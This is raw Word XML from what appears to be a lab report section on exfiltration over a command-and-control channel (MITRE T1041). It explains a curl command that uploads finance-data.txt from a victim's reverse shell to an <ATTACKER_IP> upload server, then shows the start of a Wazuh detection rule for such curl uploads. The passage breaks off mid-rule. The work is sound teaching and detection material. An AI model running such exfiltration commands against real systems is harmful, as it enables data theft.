            <w:r>
              <w:t>User/Admin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="2BFA4357" w14:paraId="23C4C89F" w14:textId="15B3400F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>(Depending on who can access the file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00ED5F9B" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="0F4B0597" w14:textId="461E035E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896707" w:id="58"/>
      <w:commentRangeStart w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:commentRangeEnd w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="59"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00883337" w:rsidP="004A5111" w:rsidRDefault="2BFA4357" w14:paraId="39170A61" w14:textId="4F2B41DA">
      <w:r>
        <w:t>Exfiltration over C2 Channel, command-and-control, is when the attacker exfiltrates sensitive files from the victim machine to the attacker controlled C2 server. In this case, the C2 server used is a python upload server running on port 8000. The attacker's goal is to exfiltrate and send the finance-data.txt out of the victim's machine. This takes place after privilege escalation to ensure the attacker has access to the sensitive files to be exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A5111" w:rsidP="004A5111" w:rsidRDefault="004A5111" w14:paraId="5AA77E47" w14:textId="2C433E3E"/>
    <w:p w:rsidR="00CC68CF" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="45AD076C" w14:textId="7D8C817E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a python upload server. This is the C2 channel used to receive the data, finance-data.txt. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB3439" w:rsidTr="00AB3439" w14:paraId="332FB6EB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AB3439" w:rsidP="00AB3439" w:rsidRDefault="00531C63" w14:paraId="10AF612D" w14:textId="19E5E311">
            <w:r>
              <w:t>python -m uploadserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003271B5" w:rsidP="00905C00" w:rsidRDefault="00DE16FB" w14:paraId="1B282287" w14:textId="6B67474E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57203161" wp14:editId="48705329">
            <wp:extent cx="3517900" cy="539597"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="2139888703" name="Picture 1" descr="A close up of a computer screen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88703" name="Picture 1" descr="A close up of a computer screen  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3517900" cy="539597"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3439" w:rsidP="00905C00" w:rsidRDefault="00AB3439" w14:paraId="4E65A814" w14:textId="5BED04E1"/>
    <w:p w:rsidR="00AB3439" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="107D1E0A" w14:textId="4CCCC015">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the reverse shell created in privilege escalation stage, enter the following to use curl to send the file contents over to the C2 channel. The file will be found in the directory where the C2 channel is started on.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w:rsidTr="16D5F394" w14:paraId="750FA731" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00531C63" w:rsidRDefault="00531C63" w14:paraId="696C268C" w14:textId="1475AC30">
            <w:r>
              <w:t>$output = (C:\Windows\System32\curl.exe -F "files=@C:\icrm\finance-data.txt" http://&lt;ATTACKER_IP&gt;:8000/upload 2&gt;&amp;1 | Out-String); Write-Host $output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00905C00" w:rsidP="00905C00" w:rsidRDefault="003271B5" w14:paraId="54BF31AC" w14:textId="7CC0DE71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1FE498" wp14:editId="4F533834">
            <wp:extent cx="5836920" cy="189230"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="61070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836920" cy="189230"/>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4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w:rsidTr="00732B3A" w14:paraId="175941F1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00140470" w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="02A84F85" w14:textId="77777777">
            <w:r>
              <w:t>$output = (…)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="0DFF547F" w14:textId="77777777">
            <w:r>
              <w:t xml:space="preserve">This assigns whatever is inside the brackets to the variable $output. This means that the output made from the command will be stored as a string in $output. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w:rsidTr="00732B3A" w14:paraId="73B3D462" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="56436EB3" w14:textId="77777777">
            <w:r>
              <w:t>C:\Windows\System32\curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="73FAB30C" w14:textId="77777777">
            <w:r>
              <w:t>The tool used to send HTTP requests to the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w:rsidTr="00732B3A" w14:paraId="3680034C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="54E7ABB6" w14:textId="77777777">
            <w:r>
              <w:t>-F “files=@C:\icrm\finance-data.txt”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="56B3458D" w14:textId="77777777">
            <w:r>
              <w:t>This specify the file, “</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r>
              <w:t>C:\icrm\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>finance</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>data.txt</w:t>
            </w:r>
            <w:r>
              <w:t>”, to attach and send.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w:rsidTr="00732B3A" w14:paraId="1F695031" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="680B429D" w14:textId="77777777">
            <w:r>
              <w:t>http://&lt;ATTACKER_IP&gt;:8000/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="1307703B" w14:textId="77777777">
            <w:r>
              <w:t>The destination server and path is set to &lt;ATTACKER_IP&gt;, which is the attacker controlled upload server, C2 channel. The 8000 is the port the server is listening on. /upload is to specify to send to the upload server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00531C63" w:rsidTr="00732B3A" w14:paraId="4BF563BC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="00531C63" w14:paraId="26362997" w14:textId="77777777">
            <w:r>
              <w:t>2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00732B3A" w:rsidRDefault="005F6B8B" w14:paraId="06E64BC4" w14:textId="67D4EBC2">
            <w:r>
              <w:t>Normal ouput and errors will be combined to ensure that the $output variable will not have errors in it. This is done by redirecting errors to normal output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C15E83" w:rsidTr="00732B3A" w14:paraId="0F0944DE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C15E83" w:rsidP="00C15E83" w:rsidRDefault="00C15E83" w14:paraId="200012B8" w14:textId="07C2A33A">
            <w:r>
              <w:t>| Out-String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C15E83" w:rsidP="00C15E83" w:rsidRDefault="005F6B8B" w14:paraId="3DDAD424" w14:textId="13DFA8C1">
            <w:r>
              <w:t>This converts the output lines into a string to allow the output to be printed properly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C15E83" w:rsidTr="00732B3A" w14:paraId="08200DF1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C15E83" w:rsidP="00C15E83" w:rsidRDefault="00C15E83" w14:paraId="3011970E" w14:textId="77777777">
            <w:r>
              <w:t>Write-Host $output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C15E83" w:rsidP="00C15E83" w:rsidRDefault="005F6B8B" w14:paraId="2DDCBBDE" w14:textId="468C22FB">
            <w:r>
              <w:t>This prints out the output at the end.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C05F84" w:rsidP="00905C00" w:rsidRDefault="00C05F84" w14:paraId="6222CB36" w14:textId="2C4E7FDE"/>
    <w:p w:rsidR="00AB3439" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="43D5353E" w14:textId="152001F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To verify that the exfiltration is successful, use cat to view the contents of the file exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9182"/>
      </w:tblGrid>
      <w:tr w:rsidR="00531C63" w:rsidTr="00531C63" w14:paraId="6B6FC844" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00531C63" w:rsidP="00531C63" w:rsidRDefault="00531C63" w14:paraId="1922E9CB" w14:textId="213A9B36">
            <w:r>
              <w:t>cat finance-data.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AB3439" w:rsidP="00905C00" w:rsidRDefault="003F02C2" w14:paraId="5EB43141" w14:textId="45CA411C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12390A3E" wp14:editId="562DE0F4">
            <wp:extent cx="1816100" cy="503052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="424206439" name="Picture 1" descr="A close up of a sign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06439" name="Picture 1" descr="A close up of a sign  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1937101" cy="536569"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3439" w:rsidP="00905C00" w:rsidRDefault="00AB3439" w14:paraId="2594D4BE" w14:textId="09CE5F62"/>
    <w:p w:rsidR="00AB3439" w:rsidP="00E41785" w:rsidRDefault="624D80FE" w14:paraId="1F740C46" w14:textId="16B34603">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The python upload server listner shows the file, finance-data.txt, being uploaded successfully and stored in the /root directory as finance-data.txt. “POST /upload HTTP/1.1” shows that the victim machine is sending the data to the /upload endpoint of the attacker server using HTTP POST. POST is used to send the data as the content is a file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2BFA4357" w:rsidP="624D80FE" w:rsidRDefault="2BFA4357" w14:paraId="09FFEAE9" w14:textId="4962B5DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5315AF00" wp14:editId="0955FE99">
            <wp:extent cx="5829300" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47397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450" name="Picture 47397450"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="7C485DE4" w14:textId="2CDF4530">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896708" w:id="60"/>
      <w:commentRangeStart w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
      <w:commentRangeEnd w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="61"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001548A6" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="129B2EAC" w14:textId="7B26D058">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There is both network and host-based detection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="7F470077" w14:textId="7F2F86CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network-based detection focuses on the outbound traffic from the victim machine. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Wazuh rule is used to detect suspicious curl attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="546AAA22" w:rsidP="546AAA22" w:rsidRDefault="546AAA22" w14:paraId="24B27128" w14:textId="44243396">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BAFB8E6" wp14:editId="2C12E3B6">
            <wp:extent cx="5829300" cy="352425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21336267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26723" name="Picture 2133626723"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="352425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241A5521" wp14:editId="31FF142F">
            <wp:extent cx="5829300" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1712688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88240" name="Picture 1712688240"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5504FEAD" wp14:editId="544C8EE8">
            <wp:extent cx="5829300" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2281568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56827" name="Picture 228156827"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="1581150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9295" w:type="dxa"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6835"/>
        <w:gridCol w:w="2460"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00924A31" w:rsidR="00B1604B" w:rsidTr="099E7C3F" w14:paraId="042BC73A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7135" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AD34ED" w:rsidP="43CEF484" w:rsidRDefault="43CEF484" w14:paraId="2953B644" w14:textId="208FF19B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&lt;group name="exfiltration,curl,mitre_T1041"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="7527F84A" w14:textId="266C3A0F">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;rule id="300004" level="12"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="43CEF484" w:rsidRDefault="43CEF484" w14:paraId="201A55CA" w14:textId="07AC60BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;if_sid&gt;61603&lt;/if_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="43CEF484" w:rsidRDefault="43CEF484" w14:paraId="00226673" w14:textId="7C5C82E4">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;field name="win.eventdata.image" type="pcre2"&gt;(?i).*curl\.exe$&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="5157EB91" w14:textId="56CD450C">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;field name="win.eventdata.commandLine" type="pcre2"&gt;(?i)(-F|--form|-d|--data|--upload-file).*(http:\/\/|https:\/\/)&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="099E7C3F" w:rsidRDefault="099E7C3F" w14:paraId="0C8CE86E" w14:textId="0662341A">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;description&gt;MITRE ATT&amp;CK T1041: Exfiltration via Exfiltration Over C2 Channel&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="0AFFC184" w14:textId="2EDB1D7F">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="69E87D43" w14:textId="2197B026">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">      &lt;id&gt;T1041&lt;/id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD34ED" w:rsidP="0CC9AE5F" w:rsidRDefault="0CC9AE5F" w14:paraId="546D3D2A" w14:textId="334E7395">
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
